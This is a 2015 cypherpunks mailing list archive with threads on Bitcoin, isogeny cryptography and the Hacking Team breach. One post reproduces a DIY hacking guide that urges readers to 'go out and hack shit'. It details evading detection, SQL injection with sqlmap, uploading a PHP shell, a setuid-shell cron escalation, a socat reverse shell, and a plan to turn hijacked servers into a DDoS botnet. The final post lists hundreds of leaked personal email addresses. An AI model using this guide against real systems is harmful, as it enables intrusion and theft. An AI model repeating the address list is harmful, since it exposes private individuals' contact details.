=dPyV -----END PGP SIGNATURE----- From list at sysfu.com Wed Jul 8 11:17:45 2015 From: list at sysfu.com (Seth) Date: Wed, 08 Jul 2015 11:17:45 -0700 Subject: Bitcoin exchanges. In-Reply-To: References: Message-ID: On Wed, 08 Jul 2015 05:41:37 -0700, Edd thompson wrote: > Is there and way a person can get their paycheck direct deposit to a > Bitcoin? So instead of a deposit to a checking account it goes to an > exchange that converts it for you? Not aware of any services that perform this in an automated fashion. Might be a entrepreneurial opportunity. > And then is there a good way to access currency in rural areas? Are you talking about converting BTC back into fiat cash? I don't know of a way to do that either. You want to consider signing up for an account at Purse.io. That will allow you to buy products on Amazon using BTC (at a significant discount I might add) where the products can then be shipped to a location of your choosing. > I have seen a few videos and read overviews but they never get to how to > make it practical for people not in big cities, hell it just doesn't seem > practical at all unless you live near an exchange or are willing to do > credit card transactions that cost on top of the exchange and make the > currency traceable. Having other people buy items for you via Purse.io might throw another of obfuscation into the mix, but you still have to have any physical goods shipped to an address, which doesn't really help if you want to perform untraceable transactions. From carimachet at gmail.com Wed Jul 8 03:34:28 2015 From: carimachet at gmail.com (Cari Machet) Date: Wed, 8 Jul 2015 13:34:28 +0300 Subject: Hacking Team has been hacked (hard) In-Reply-To: <559a2670.88da8c0a.a23b.ffffe2a2@mx.google.com> References: <5599F683.40200@gna.org> <5599FBB5.402@riseup.net> <7a51599a75afd16669ae66aee50235ac@cryptolab.net> <559a2670.88da8c0a.a23b.ffffe2a2@mx.google.com> Message-ID: Hahhaha u r genius ... WRONG fucking fascist capitalist neo nazi fucks ... so fucked up On Jul 6, 2015 9:57 AM, "Juan" wrote: > they* > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 399 bytes Desc: not available URL: From coderman at gmail.com Wed Jul 8 15:56:50 2015 From: coderman at gmail.com (coderman) Date: Wed, 8 Jul 2015 15:56:50 -0700 Subject: Hacking Team has been hacked (hard) In-Reply-To: References: <5599F683.40200@gna.org> <559C4E88.4050506@riseup.net> <559D4A13.6070301@riseup.net> Message-ID: On 7/8/15, Razer wrote: > ... that may be from the day when > people paid by the byte for internet service. Should I post the > entirety? It's kinda long. JYA and me and history prefer verbatim, and long since gone the days when bandwidth bytes begged brevity now, just /s TL;DR or ignore... [ and yes the whole thing :P ] best regards, From coderman at gmail.com Wed Jul 8 15:58:39 2015 From: coderman at gmail.com (coderman) Date: Wed, 8 Jul 2015 15:58:39 -0700 Subject: Crypto Wars 2.0 Message-ID: "Security Researchers are “the antibodies of the digital immune system” @Infosecjen in Senate Judiciary hearing encouraging more modern CFAA" - https://twitter.com/joshcorman/status/618914661128380416 "we may give you a rash, make you irritated. but it is for your own good, earth humans." longer transcript: https://www.judiciary.senate.gov/meetings/cyber-crime-modernizing-our-legal-framework-for-the-information-age best regards, From mirimir at riseup.net Wed Jul 8 23:18:03 2015 From: mirimir at riseup.net (Mirimir) Date: Thu, 09 Jul 2015 00:18:03 -0600 Subject: Bitcoin exchanges. In-Reply-To: References: Message-ID: <559E121B.90503@riseup.net> On 07/08/2015 12:17 PM, Seth wrote: > On Wed, 08 Jul 2015 05:41:37 -0700, Edd thompson wrote: > >> Is there and way a person can get their paycheck direct deposit to a >> Bitcoin? So instead of a deposit to a checking account it goes to an >> exchange that converts it for you? > > Not aware of any services that perform this in an automated fashion. > Might be a entrepreneurial opportunity. > >> And then is there a good way to access currency in rural areas? > > Are you talking about converting BTC back into fiat cash? I don't know > of a way to do that either. You can buy meatspace and online gift cards at egifter.com or gyft.com with Bitcoin. > You want to consider signing up for an account at Purse.io. That will > allow you to buy products on Amazon using BTC (at a significant discount > I might add) where the products can then be shipped to a location of > your choosing. > >> I have seen a few videos and read overviews but they never get to how to >> make it practical for people not in big cities, hell it just doesn't seem >> practical at all unless you live near an exchange or are willing to do >> credit card transactions that cost on top of the exchange and make the >> currency traceable. > > Having other people buy items for you via Purse.io might throw another > of obfuscation into the mix, but you still have to have any physical > goods shipped to an address, which doesn't really help if you want to > perform untraceable transactions. Getting stuff anonymously in meatspace is nontrivial. Mailbox and remailer services require photo ID. Another entrepreneurial opportunity. From coderman at gmail.com Thu Jul 9 00:34:25 2015 From: coderman at gmail.com (coderman) Date: Thu, 9 Jul 2015 00:34:25 -0700 Subject: Hacking Team has been hacked (hard) In-Reply-To: References: <5599F683.40200@gna.org> <559C4E88.4050506@riseup.net> Message-ID: On 7/8/15, coderman wrote: > ... > hacking fucks who deserve it is the best feeling in life :) > ... > die happy tomorrow level satisfaction! i should note i was referring to my prior life as Nevil Maskelyne (1863–1924) and the hack of Marconi's wireless telegraph for great justice. this life i am code janitor... best regards, From coderman at gmail.com Thu Jul 9 01:24:12 2015 From: coderman at gmail.com (coderman) Date: Thu, 9 Jul 2015 01:24:12 -0700 Subject: [cryptography] Supersingular Isogeny DH In-Reply-To: <559E13D3.8040602@dev-nu11.de> References: <54C5545F.3060600@gmail.com> <54C92127.5060900@dev-nu11.de> <54C92732.70202@gmail.com> <54C9C907.5090501@dev-nu11.de> <559E13D3.8040602@dev-nu11.de> Message-ID: On 7/8/15, Marcel wrote: > ... > So my question is, why do i need to random values m_A and n_A to compute > the torsiongroup E[l_A] and respectively the kernel K_A ? > > Why does is not suffice to use only 1 point to generate E[l_A] and > Kernel K_A ? it is late, and i may mis understand, yet the two are requisite for peers arriving at a shared secret by way of these constructed isogeny; and the random values necessary to not give too much (confirm secret values, without exposing secret values) i found this paper a helpful expansion on the subject: http://cacr.uwaterloo.ca/techreports/2014/cacr2014-20.pdf "In this paper, we mainly explore the efficiency of implementing recently proposed isogeny-based post-quantum public key cryptography..." specifically the graph on page 5. note that the key exchange relies on finding a path connecting vertices in a graph of supersingular isogenies - thus a pair on both ends, not just a pair arrived at among both participants. if this is clear as mud, i will try tomorrow on a fresh brain :) best regards, From mickeybob at gmail.com Thu Jul 9 03:49:52 2015 From: mickeybob at gmail.com (Michael Naber) Date: Thu, 9 Jul 2015 06:49:52 -0400 Subject: Bitcoin exchanges. In-Reply-To: References: Message-ID: Yes: https://www.bitwage.co/ On Wed, Jul 8, 2015 at 8:41 AM, Edd thompson wrote: > Is there and way a person can get their paycheck direct deposit to a > Bitcoin? So instead of a deposit to a checking account it goes to an > exchange that converts it for you? And then is there a good way to access > currency in rural areas? > I have seen a few videos and read overviews but they never get to how to > make it practical for people not in big cities, hell it just doesn't seem > practical at all unless you live near an exchange or are willing to do > credit card transactions that cost on top of the exchange and make the > currency traceable. > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1008 bytes Desc: not available URL: From Rayzer at riseup.net Thu Jul 9 10:04:04 2015 From: Rayzer at riseup.net (Razer) Date: Thu, 09 Jul 2015 10:04:04 -0700 Subject: Hacking Team has been hacked (hard, and long) In-Reply-To: References: <5599F683.40200@gna.org> <559C4E88.4050506@riseup.net> Message-ID: <559EA984.1000705@riseup.net> On 07/08/2015 03:29 AM, coderman wrote: > why just the header Rayzer? > > a guide this good demands completeness > > --- >> B/c Listiquette (Trim your posts) Albeit that may be from the day when people paid by the byte for internet service. Should I post the entirety? It's kinda long. >> >> RR On 07/08/2015 03:55 PM, coderman wrote: > On 7/8/15, Razer wrote: > ... that may be from the day when > people paid by the byte for internet service. Should I post the > entirety? It's kinda long. >> JYA and me and history prefer verbatim, >> and long since gone the days when bandwidth bytes begged brevity >> >> now, just /s TL;DR or ignore... [ and yes the whole thing :P ] >> >> >> best regards, ---------------------------------------------------------------------- ----------------------------------------------------- _ _ _ ____ _ _ | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | | _ | (_| | (__| < | |_) | (_| | (__| <|_| |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) A DIY Guide for those without the patience to wait for whistleblowers --[ 1 ]-- Introduction I'm not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz it took to 0wn Gamma. I'm writing this to demystify hacking, to show how simple it is, and to hopefully inform and inspire you to go out and hack shit. If you have no experience with programming or hacking, some of the text below might look like a foreign language. Check the resources section at the end to help you get started. And trust me, once you've learned the basics you'll realize this really is easier than filing a FOIA request. --[ 2 ]-- Staying Safe This is illegal, so you'll need to take same basic precautions: 1) Make a hidden encrypted volume with Truecrypt 7.1a [0] 2) Inside the encrypted volume install Whonix [1] 3) (Optional) While just having everything go over Tor thanks to Whonix is probably sufficient, it's better to not use an internet connection connected to your name or address. A cantenna, aircrack, and reaver can come in handy here. [0] https://truecrypt.ch/downloads/ [1] https://www.whonix.org/wiki/Download#Install_Whonix As long as you follow common sense like never do anything hacking related outside of Whonix, never do any of your normal computer usage inside Whonix, never mention any information about your real life when talking with other hackers, and never brag about your illegal hacking exploits to friends in real life, then you can pretty much do whatever you want with no fear of being v&. NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable for some things like web browsing, when it comes to using hacking tools like nmap, sqlmap, and nikto that are making thousands of requests, they will run very slowly over Tor. Not to mention that you'll want a public IP address to receive connect back shells. I recommend using servers you've hacked or a VPS paid with bitcoin to hack from. That way only the low bandwidth text interface between you and the server is over Tor. All the commands you're running will have a nice fast connection to your target. --[ 3 ]-- Mapping out the target Basically I just repeatedly use fierce [0], whois lookups on IP addresses and domain names, and reverse whois lookups to find all IP address space and domain names associated with an organization. [0] http://ha.ckers.org/fierce/ For an example let's take Blackwater. We start out knowing their homepage is at academi.com. Running fierce.pl -dns academi.com we find the subdomains: 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com Now we do whois lookups and find the homepage of www.academi.com is hosted on Amazon Web Service, while the other IPs are in the range: NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd Doing a whois lookup on academi.com reveals it's also registered to the same address, so we'll use that as a string to search with for the reverse whois lookups. As far as I know all the actual reverse whois lookup services cost money, so I just cheat with google: "850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools Now run fierce.pl -range on the IP ranges you find to lookup dns names, and fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more whois lookups and repeat the process until you've found everything. Also just google the organization and browse around its websites. For example on academi.com we find links to a careers portal, an online store, and an employee resources page, so now we have some more: 54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com If you repeat the whois lookups and such you'll find academiproshop.com seems to not be hosted or maintained by Blackwater, so scratch that off the list of interesting IPs/domains. In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com was simply a whois lookup of finfisher.com which found it registered to the name "FinFisher GmbH". Googling for: "FinFisher GmbH" inurl:domaintools finds gamma-international.de, which redirects to finsupport.finfisher.com ...so now you've got some idea how I map out a target. This is actually one of the most important parts, as the larger the attack surface that you are able to map out, the easier it will be to find a hole somewhere in it. --[ 4 ]-- Scanning & Exploiting Scan all the IP ranges you found with nmap to find all services running. Aside from a standard port scan, scanning for SNMP is underrated. Now for each service you find running: 1) Is it exposing something it shouldn't? Sometimes companies will have services running that require no authentication and just assume it's safe because the url or IP to access it isn't public. Maybe fierce found a git subdomain and you can go to git.companyname.come/gitweb/ and browse their source code. 2) Is it horribly misconfigured? Maybe they have an ftp server that allows anonymous read or write access to an important directory. Maybe they have a database server with a blank admin password (lol stratfor). Maybe their embedded devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer's default password. 3) Is it running an old version of software vulnerable to a public exploit? Webservers deserve their own category. For any webservers, including ones nmap will often find running on nonstandard ports, I usually: 1) Browse them. Especially on subdomains that fierce finds which aren't intended for public viewing like test.company.com or dev.company.com you'll often find interesting stuff just by looking at them. 2) Run nikto [0]. This will check for things like webserver/.svn/, webserver/backup/, webserver/phpinfo.php, and a few thousand other common mistakes and misconfigurations. 3) Identify what software is being used on the website. WhatWeb is useful [1] 4) Depending on what software the website is running, use more specific tools like wpscan [2], CMS-Explorer [3], and Joomscan [4]. First try that against all services to see if any have a misconfiguration, publicly known vulnerability, or other easy way in. If not, it's time to move on to finding a new vulnerability: 5) Custom coded web apps are more fertile ground for bugs than large widely used projects, so try those first. I use ZAP [5], and some combination of its automated tests along with manually poking around with the help of its intercepting proxy. 6) For the non-custom software they're running, get a copy to look at. If it's free software you can just download it. If it's proprietary you can usually pirate it. If it's proprietary and obscure enough that you can't pirate it you can buy it (lame) or find other sites running the same software using google, find one that's easier to hack, and get a copy from them. [0] http://www.cirt.net/nikto2 [1] http://www.morningstarsecurity.com/research/whatweb [2] http://wpscan.org/ [3] https://code.google.com/p/cms-explorer/ [4] http://sourceforge.net/projects/joomscan/ [5] https://code.google.com/p/zaproxy/ For finsupport.finfisher.com the process was: * Start nikto running in the background. * Visit the website. See nothing but a login page. Quickly check for sqli in the login form. * See if WhatWeb knows anything about what software the site is running. * WhatWeb doesn't recognize it, so the next question I want answered is if this is a custom website by Gamma, or if there are other websites using the same software. * I view the page source to find a URL I can search on (index.php isn't exactly unique to this software). I pick Scripts/scripts.js.php, and google: allinurl:"Scripts/scripts.js.php" * I find there's a handful of other sites using the same software, all coded by the same small webdesign firm. It looks like each site is custom coded but they share a lot of code. So I hack a couple of them to get a collection of code written by the webdesign firm. At this point I can see the news stories that journalists will write to drum up views: "In a sophisticated, multi-step attack, hackers first compromised a web design firm in order to acquire confidential data that would aid them in attacking Gamma Group..." But it's really quite easy, done almost on autopilot once you get the hang of it. It took all of a couple minutes to: * google allinurl:"Scripts/scripts.js.php" and find the other sites * Notice they're all sql injectable in the first url parameter I try. * Realize they're running Apache ModSecurity so I need to use sqlmap [0] with the option --tamper='tamper/modsecurityversioned.py' * Acquire the admin login information, login and upload a php shell [1] (the check for allowable file extensions was done client side in javascript), and download the website's source code. [0] http://sqlmap.org/ [1] https://epinna.github.io/Weevely/ Looking through the source code they might as well have named it Damn Vulnerable Web App v2 [0]. It's got sqli, LFI, file upload checks done client side in javascript, and if you're unauthenticated the admin page just sends you back to the login page with a Location header, but you can have your intercepting proxy filter the Location header out and access it just fine. [0] http://www.dvwa.co.uk/ Heading back over to the finsupport site, the admin /BackOffice/ page returns 403 Forbidden, and I'm having some issues with the LFI, so I switch to using the sqli (it's nice to have a dozen options to choose from). The other sites by the web designer all had an injectable print.php, so some quick requests to: https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1 reveal that finsupport also has print.php and it is injectable. And it's database admin! For MySQL this means you can read and write files. It turns out the site has magicquotes enabled, so I can't use INTO OUTFILE to write files. But I can use a short script that uses sqlmap --file-read to get the php source for a URL, and a normal web request to get the HTML, and then finds files included or required in the php source, and finds php files linked in the HTML, to recursively download the source to the whole site. Looking through the source, I see customers can attach a file to their support tickets, and there's no check on the file extension. So I pick a username and password out of the customer database, create a support request with a php shell attached, and I'm in! --[ 5 ]-- (fail at) Escalating ___________ < got r00t? ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^ Root over 50% of linux servers you encounter in the wild with two easy scripts, Linux_Exploit_Suggester [0], and unix-privesc-check [1]. [0] https://github.com/PenturaLabs/Linux_Exploit_Suggester [1] https://code.google.com/p/unix-privesc-check/ finsupport was running the latest version of Debian with no local root exploits, but unix-privesc-check returned: WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer so I add to /etc/cron.hourly/webalizer: chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell wait an hour, and ....nothing. Turns out that while the cron process is running it doesn't seem to be actually running cron jobs. Looking in the webalizer directory shows it didn't update stats the previous month. Apparently after updating the timezone cron will sometimes run at the wrong time or sometimes not run at all and you need to restart cron after changing the timezone. ls -l /etc/localtime shows the timezone got updated June 6, the same time webalizer stopped recording stats, so that's probably the issue. At any rate, the only thing this server does is host the website, so I already have access to everything interesting on it. Root wouldn't get much of anything new, so I move on to the rest of the network. --[ 6 ]-- Pivoting The next step is to look around the local network of the box you hacked. This is pretty much the same as the first Scanning & Exploiting step, except that from behind the firewall many more interesting services will be exposed. A tarball containing a statically linked copy of nmap and all its scripts that you can upload and run on any box is very useful for this. The various nfs-* and especially smb-* scripts nmap has will be extremely useful. The only interesting thing I could get on finsupport's local network was another webserver serving up a folder called 'qateam' containing their mobile malware. --[ 7 ]-- Have Fun Once you're in their networks, the real fun starts. Just use your imagination. While I titled this a guide for wannabe whistleblowers, there's no reason to limit yourself to leaking documents. My original plan was to: 1) Hack Gamma and obtain a copy of the FinSpy server software 2) Find vulnerabilities in FinSpy server. 3) Scan the internet for, and hack, all FinSpy C&C servers. 4) Identify the groups running them. 5) Use the C&C server to upload and run a program on all targets telling them who was spying on them. 6) Use the C&C server to uninstall FinFisher on all targets. 7) Join the former C&C servers into a botnet to DDoS Gamma Group. It was only after failing to fully hack Gamma and ending up with some interesting documents but no copy of the FinSpy server software that I had to make due with the far less lulzy backup plan of leaking their stuff while mocking them on twitter. Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password already so I can move on to step 2! --[ 8 ]-- Other Methods The general method I outlined above of scan, find vulnerabilities, and exploit is just one way to hack, probably better suited to those with a background in programming. There's no one right way, and any method that works is as good as any other. The other main ways that I'll state without going into detail are: 1) Exploits in web browers, java, flash, or microsoft office, combined with emailing employees with a convincing message to get them to open the link or attachment, or hacking a web site frequented by the employees and adding the browser/java/flash exploit to that. This is the method used by most of the government hacking groups, but you don't need to be a government with millions to spend on 0day research or subscriptions to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit for a couple thousand, and rent access to one for much less. There's also metasploit browser autopwn, but you'll probably have better luck with no exploits and a fake flash updater prompt. 2) Taking advantage of the fact that people are nice, trusting, and helpful 95% of the time. The infosec industry invented a term to make this sound like some sort of science: "Social Engineering". This is probably the way to go if you don't know too much about computers, and it really is all it takes to be a successful hacker [0]. [0] https://www.youtube.com/watch?v=DB6ywr9fngU --[ 9 ]-- Resources Links: * https://www.pentesterlab.com/exercises/ * http://overthewire.org/wargames/ * http://www.hackthissite.org/ * http://smashthestack.org/ * http://www.win.tue.nl/~aeb/linux/hh/hh.html * http://www.phrack.com/ * http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot * http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash * https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ * https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers (all his other blog posts are great too) * https://www.corelan.be/ (start at Exploit writing tutorial part 1) * http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ One trick it leaves out is that on most systems the apache access log is readable only by root, but you can still include from /proc/self/fd/10 or whatever fd apache opened it as. It would also be more useful if it mentioned what versions of php the various tricks were fixed in. * http://www.dest-unreach.org/socat/ Get usable reverse shells with a statically linked copy of socat to drop on your target and: target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM It's also useful for setting up weird pivots and all kinds of other stuff. Books: * The Web Application Hacker's Handbook * Hacking: The Art of Exploitation * The Database Hacker's Handbook * The Art of Software Security Assessment * A Bug Hunter's Diary * Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier * TCP/IP Illustrated Aside from the hacking specific stuff almost anything useful to a system administrator for setting up and administering networks will also be useful for exploring them. This includes familiarity with the windows command prompt and unix shell, basic scripting skills, knowledge of ldap, kerberos, active directory, networking, etc. --[ 10 ]-- Outro You'll notice some of this sounds exactly like what Gamma is doing. Hacking is a tool. It's not selling hacking tools that makes Gamma evil. It's who their customers are targeting and with what purpose that makes them evil. That's not to say that tools are inherently neutral. Hacking is an offensive tool. In the same way that guerrilla warfare makes it harder to occupy a country, whenever it's cheaper to attack than to defend it's harder to maintain illegitimate authority and inequality. So I wrote this to try to make hacking easier and more accessible. And I wanted to show that the Gamma Group hack really was nothing fancy, just standard sqli, and that you do have the ability to go out and take similar action. Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned hackers, dissidents, and criminals! ==30== -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: OpenPGP digital signature URL: From jya at pipeline.com Thu Jul 9 07:12:06 2015 From: jya at pipeline.com (John Young) Date: Thu, 09 Jul 2015 10:12:06 -0400 Subject: Caspar Bowden has died Message-ID: Privacy activist Caspar Bowden has died https://translate.google.com/translate?sl=auto&tl=en&js=y&prev=_t&hl=en&ie=UTF-8&u=https%3A%2F%2Fnetzpolitik.org%2F2015%2Fdatenschutz-aktivist-caspar-bowden-ist-gestorben%2F&edit-text= From Rayzer at riseup.net Thu Jul 9 10:20:33 2015 From: Rayzer at riseup.net (Razer) Date: Thu, 09 Jul 2015 10:20:33 -0700 Subject: Hacking Team has been hacked (hard, and long) In-Reply-To: References: <5599F683.40200@gna.org> <559C4E88.4050506@riseup.net> <559D4A13.6070301@riseup.net> Message-ID: <559EAD61.5020502@riseup.net> On 07/08/2015 03:55 PM, coderman wrote: > On 7/8/15, Razer wrote: >> ... that may be from the day when >> people paid by the byte for internet service. Should I post the >> entirety? It's kinda long. > > JYA and me and history prefer verbatim, > and long since gone the days when bandwidth bytes begged brevity > > now, just /s TL;DR or ignore... [ and yes the whole thing :P ] > > > best regards, The bounceback to RiseUp mail triggered the possible ***SPAM*** indicator. Something that never happens with person-person emails. Apparently I'm NOT alone in the previously stated sentiment, or perhaps it's the number of links in the post. RR -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: OpenPGP digital signature URL: From jya at pipeline.com Thu Jul 9 08:32:18 2015 From: jya at pipeline.com (John Young) Date: Thu, 09 Jul 2015 11:32:18 -0400 Subject: WABC radio Seeks NYSE Outage Leads Message-ID: Aaron Klein, WABC radio, NYC, seeks tips, leads on NYSE and other outages http://aol.com > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 195 bytes Desc: not available URL: From coderman at gmail.com Thu Jul 9 17:19:11 2015 From: coderman at gmail.com (coderman) Date: Thu, 9 Jul 2015 17:19:11 -0700 Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?] Message-ID: https://wikileaks.org/hackingteam/emails/emailid/144932 01nurlan at gmail.com 139011 at gmail.com 6442221 at gmail.com 7715 at rijnmond.politie.nl aaron.garza at fcc.gov aaron.j.robinson at us.army.mil a_a_sh70 at hotmail.com aa.system01 at gmail.com aav at kgb.gov.by aaziz at bnm.gov.my abalabekyan at hotmail.com abayrak at btt.com.tr abbaadamu at gmail.com abbasal_shamry at yahoo.com abd.alharbi at hotmail.com abdaziz.k at hasil.gov.my abdulllaaahhh at yahoo.com abdulmoez at dsc.sa a.bennasser at moi.gov.kw abhashkumar at yahoo.co.in abiner.ringo at kpk.go.id a-binhassan at moisp.gov.sa abiyworetaw at yahoo.com abo_saud11 at hotmail.com a.bouamoud at gmail.com abu.baker at ymail.com abudhabiDAO at state.gov abymal at gmail.com acantus at policeone.com acar1999 at hotmail.com Adam.Weinberg at nice.com adecoms88_rescue at yahoo.com adel.almehairi at aecert.ae adhitya.w.lfoc at gmail.com adilson.bortolin at gmail.com adj at siprga.net adnan at natarmsusa.com a.doukeli at cybercrimeunit.gr adrenlam at singnet.com.sg aekanut29 at gmail.com aenbacka at gmail.com aerichardson at kparuba.com aesalem at hotmail.com a.fakrizaki at gmail.com afg.prague at centrum.cz afif.kamaruddin at gmail.com agalli at amg.it aggab.alassadi at gmail.com a.giordani at tsf.it agrif1 at fairfaxcounty.gov ahmad at ascendeongroup.com ahmadfikri at rmp.gov.my ahmad.mubarok at kpk.go.id ahmad at shamsi.org.uk ahmed at aecom.com.sa ahmedhapshon at yahoo.com ahmedmurad78 at gmail.com ahmednader at ymail.com ahmedtim2001 at yahoo.ca ahsen.zaidi at mobilink.net aidil.chendramata at kominfo.go.id aied22 at yahoo.com aimen at amanags.com ajamal at vertexant.de akfwd5375 at hotmail.com akoualah at yahoo.fr aksel.flakstad at politiet.no aksingh2323 at gmail.com akz at nexatech.fr alamad at hotmail.com Alan.Okonski at dhs.gov alattabi999 at gmail.com alban.lefebvre at gendarmerie.interieur.gouv.fr albawardy at gmail.com albertario.marco at sea-aeroportimilano.it albertodrago900 at gmail.com alberto at eecs.berkeley.edu alberto.montanari at ducati.com albwardy at gmail.com ALDI.ROSI at KPK.GO.ID aldo.romanini at cobospa.it al-edresi at hotmail.com alegail2011-qt at hotmail.com aleksandar.mitic at mod.gov.rs ales.kropac at gmail.com Alessandro.Alberici at Ecs-group.com alessandro.alfonsi at hp.com alessandro.brucato at mail.polimi.it alessandro.mordacci at ericsson.com Alessandro.romito at ca-cib.com alex_leow at cnb.gov.sg alexpetersburg at hotmail.com aleye.lin at gmail.com alfieta.baroroh at kpk.go.id alfred.farrington at gmail.com alhaji.inuwa at gmail.com al.hamad1000 at gmail.com ali980 at gmail.com alice.bardney-boose at ic.fbi.gov alicia.loney at dc.gov aling.ramadhan11 at gmail.com alkhattab at gmail.com alkuwaiti1 at gmail.com allan at allancook.com almanzar.edu at hotmail.com almeshal33 at yahoo.com almisrata at gmail.com almlgaa at yahoo.com alrahego1122 at hotmail.com alueendompz at yahoo.co.uk alvin.burns at gmail.com alzaidie at gmail.com amal.berkia at yahoo.fr amaraa_mm at yahoo.com amar at cmc.gov.my a.mataure at hotmail.com ambru.burril at wanadoo.fr amdelange at gmail.com ameesh.suthar at navy.mil amersultan at gmail.com amgmarki at gmail.com amikelli at cis.gov.cy amina_1818 at yahoo.com amirhilman92 at gmail.com amirus.sharidan at gmail.com amitn at s3tel.com am at secfor.ch amucaj at yahoo.com a_mulhim at yahoo.com anandk at stratign.com ancaes526 at hotmail.com andrea.cecchinato at purina.nestle.com andrea.fabrizi at hp.com Andrea.Falaschetti at live.com andrea.formenti at areamcr.com andrea.petti at ericsson.com andrea.raffaelli at carabinieri.it andrea.rigoni at gcsec.org andreas.karl at polizei.bayern.de Andreas.Lutzenberger at sparkasse.it andreas.metscher at diplo.de andreas.steffan at diplo.de andrekisosi at yahoo.fr andrew.beet at met.police.uk andrew.bonillo at usss.dhs.gov andrew.chester at junorisk.com andreykud78 at gmail.com andrikarsa at gmail.com androit20 at gmail.com andy.purwana at kpk.go.id andy at x31.com andy.yeman at lmco.com andzejus.roginskis at policija.lt angelena.griffiths at fairfaxcounty.gov angel.HN.Lei at pj.gov.mo angelo.carnati at it.nestle.com angelo.ceragioli at ferrero.com angelo.ferraris at loquendo.com angelo.lombardi at oci.fda.gov angel.ruiz at mwaa.com ani.puji55 at gmail.com anitamarialaila at gmail.com anne.pearson at usss.dhs.gov anthony.diclemente at ic.fbi.gov anthony.dupree at comcast.net anthony.m.bard.civ at mail.mil anthony_sawaya at hotmail.com anthonysouh at yahoo.com anthonywenger at hotmail.com antonino.moreschi at csebo.it antonioudimitros at gmail.com anuar6917179 at yahoo.com apatactical at gmail.com aphirak.pich at gmail.com apierazzi at credem.it apolo66 at hotmail.com april.smyrnioudis at dhs.gov arashutoshranjan9 at gmail.com ardcartagena at gmail.com arefyamani at gmail.com are_geh at yahoo.com arikpa at gmail.com aring at gmavt.net arisandy.saputra at kpk.go.id arman at cybersecurity.my arnolditsol at ymail.com arno.lems at minbzk.nl as4848 at vsd.lt asawaya at meatel.com a.scottnaidoo at saps.gov.za ashfaq95 at gmail.com askjwi at gmail.com asmuni at cmc.gov.my asoto at asoto.com aspen214 at hotmail.com assistant.personnel at ambassadetogo.org assistenza.teklastructures at harpaceas.it a.stathaki at cybercrimeunit.gr a.taleb at intertech-batinorm.com atgultekin at bordotek.com athenabvi at gmail.com atle.berglund at politiet.no a.trombetta at finlombardasgr.it atsachristian at yahoo.com at at semcoindia.com attdeffrtbilissi at yahoo.fr attiq.24 at gmail.com audrius.svedas at policija.lt a.van.oosterhout at minjus.nl avelasco at cicomusa.com a.vismara at equitasim.it Avner.Turniansky at verint.com avv.giuseppeserafini at gmail.com awizobae at yahoo.fr ayehya99 at hotmail.com azahari.omar at petronas.com.my azam at sprm.gov.my azhar.embong at gmail.com bachir.benyammi at mbis-inc.net bachir.tirichine at mbis-inc.net badar.alsalehi at ita.gov.om badraldelger at yahoo.com badunggrace at yahoo.com bagoes.purnomo at kpk.go.id baikapaddy at yahoo.com baim301 at gmail.com balinda at mail.com balogh.laszlo at nmhh.hu BAN023 at politi.dk bandar_il35 at hotmail.com bar03 at co.henrico.va.us baraku72 at yahoo.com barbara.kilar at msz.gov.pl barbie.40 at libero.it barkanyi.pal at kfh.hu barkanyi.pal at knbsz.gov.hu barristerosuagwu at yahoo.co.uk barroso at tid.es basia at interoptic.co.za b.a.stap at minjus.nl batiszlevente at gmail.com bayoidowu2001 at yahoo.com Bayu.pram at gmail.com bbayar9199 at gmail.com bbharbi at tcc-ict.com bcre_cab_cgn at mdn.dz bekiragi at hotmail.com bekirpeker at msn.com beleid5 at minbzk.nl belkamel1971 at yahoo.fr benes at stech.cz benjamin.bouilland at interieur.gouv.fr benjamin.moles at fco.gov.uk Benjamin.petrone at ic.fbi.gov benjichen at lissome.sg benoit.voisin at gendarmerie.interieur.gouv.fr ben-timmins at clear.net.nz berberiabdo at gmail.com bernard_tan at mha.gov.sg bernhard.stuetz at stz-netze.de bert.aben at flevoland.politie.nl bertrand.delfosse at fccu.be 